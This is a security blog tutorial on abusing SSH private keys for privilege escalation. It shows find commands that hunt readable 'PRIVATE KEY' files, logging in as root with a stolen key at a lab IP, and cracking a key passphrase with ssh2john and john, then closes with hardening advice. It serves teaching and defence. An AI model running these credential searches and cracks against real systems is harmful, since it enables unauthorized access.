VK9 Security

[Privilege Escalation] SSH Keys

by | Nov 18, 2023 | Privilege Escalation | 0 comments

SSH keys explained - DEV Community

SSH keys, or Secure Shell keys, are cryptographic keys used for secure communication over an unsecured network. They provide a secure method for authentication between a client and a server, allowing users to access and manage remote systems securely.

Security Risks:

Key Theft:

  • If an unauthorized person gains access to your private SSH key, they can impersonate you and gain unauthorized access to systems you have access to.

Weak Key Generation:

  • Poorly generated keys may be susceptible to brute-force attacks. It’s crucial to use a strong, random key generation process.

Key Spoofing:

  • Attackers might attempt to intercept or manipulate the communication to present a false public key, leading to potential security breaches.

Unauthorized Key Access:

  • If an attacker gains access to an authorized user’s public key, they can add it to their own authorized_keys file and gain access to systems.

Key Exposure:

  • Storing private keys on insecure devices or sharing them improperly increases the risk of exposure.

Example of User & key creation

User Creation

1. Use the following command to add a new user (replace username with the desired username):

  • sudo useradd -m user1

The -m option ensures that a home directory is created for the user.

2. Set a password for the new user:

  • sudo passwd user1

Follow the prompts to enter and confirm the password.

RSA SSH keys creation

1. Now, you can add an RSA SSH certificate for the user. You can do this by creating a .ssh directory in the user’s home directory and adding an authorized_keys file to it.

  • mkdir -p /home/user1/.ssh
  • touch /home/user1/.ssh/authorized_keys

2. Set the appropriate permissions for the .ssh directory and the authorized_keys file:

  • chmod 700 /home/user1/.ssh
  • chmod 600 /home/user1/.ssh/authorized_keys
  • (OPTIONAL) chown -R username:username /home/username/.ssh

3. Generate the key pair. This command will create a new RSA key pair (private and public keys) in the default location (~/.ssh/id_rsa for the private key and ~/.ssh/id_rsa.pub for the public key).

  • ssh-keygen -t rsa -b 2048

4. Add this keys, to the authorized_keys file

  • ssh-copy-id username@hostname
  • ssh-copy-id user1@Vk9-Security

Identifying keys

1. You can search for files that are readable, and contain the word “PRIVATE KEY”, then list the file. You can set up the starting point where you want

  • find / -type f -readable -exec grep -q “PRIVATE KEY” {} \; -exec sh -c ‘ls -l “$1″‘ sh {} \; 2> /dev/null
  • find /home -type f -readable -exec grep -q “PRIVATE KEY” {} \; -exec sh -c ‘ls -l “$1″‘ sh {} \; 2> /dev/null

LinPEAS

1. You can also, find some keys that can be read in .ssh files

  • ./LinPEAS.sh

Exploiting READ permission (Without password)

1. Sometimes users make backups of important files but fail to secure them with the correct permissions, or even, the original files were not secured properly, allowing other users to read the contents of SSH keys.

  • cat root_key

2. You can copy the contents of this file into your computer, and assign the permissions 600 using chmod command

  • vi id_rsa
  • chmod 600 id_rsa
  • ls -l
  • cat id_rsa

3. Using file we can make sure if this a private key, also the line “BEGIN RSA PRIVATE KEY” says it all

  • file id_rsa

4. (OPTIONAL) This key seems to be encoded in base64 format, so we try to decoded, sometimes we can find the user this key belongs to

  • echo “””<key>””” | base64 -d

Note: This screenshot is from another example

5. Now, Knowing the user this belongs to, we can try to use this key to authenticate

  • ssh -i id_rsa root@10.10.130.8
  • ssh -i id_rsa -oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa root@10.10.130.8

Note: I had to use (-oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa) because this server was not accepting the authentication offer

Exploiting READ permission (password protected)

1. Same steps a before, just when you try to use the certificate, SSH will ask for the private key password, which we don’t know

  • ssh user1@127.0.0.1 -i id_rsa

2. We need to crack the private key password, for this we can use ssh2john, to prepare the file to be cracked by john

  • ssh2john id_rsa > new_id_rsa
  • cat new_id_rsa

3. Now using john, we can crack the password

  • john –wordlist=/usr/share/wordlists/rockyou.txt new_id_rsa

Note: So here we have our password

4. Now we can try this password when SSH asks for the key pass phrase

  • ssh user1@127.0.0.1 -i id_rsa

5. (OPTIONAL) Doing again the decode with base64 string we can have an idea of what type of encryption is used

  • echo “””<key>””” | base64 -d

Recommendations

Key Management:

  • Regularly audit and manage SSH keys. Remove unused or unnecessary keys from authorized_keys files.

Strong Key Generation:

  • Use robust, industry-standard algorithms like RSA or ECDSA and ensure sufficiently long key lengths.

Passphrase Protection:

  • Assign passphrases to private keys to add an extra layer of security. This passphrase encrypts the private key and must be entered before the key can be used.

Key Rotation:

  • Periodically rotate SSH keys, especially if someone with access leaves the team or if there’s a suspicion of compromise.

Limiting Key Access:

  • Restrict the use of keys to specific IP addresses, commands, or users through the SSH configuration.

Multi-Factor Authentication (MFA):

  • Combine SSH key authentication with MFA to add an extra layer of security.

Secure Storage:

  • Store private keys securely, using hardware tokens or encrypted containers.

Regular Audits:

  • Conduct regular security audits to identify and rectify any vulnerabilities.

Monitoring:

  • Implement logging and monitoring to detect and respond to suspicious activities.
468

Submit a Comment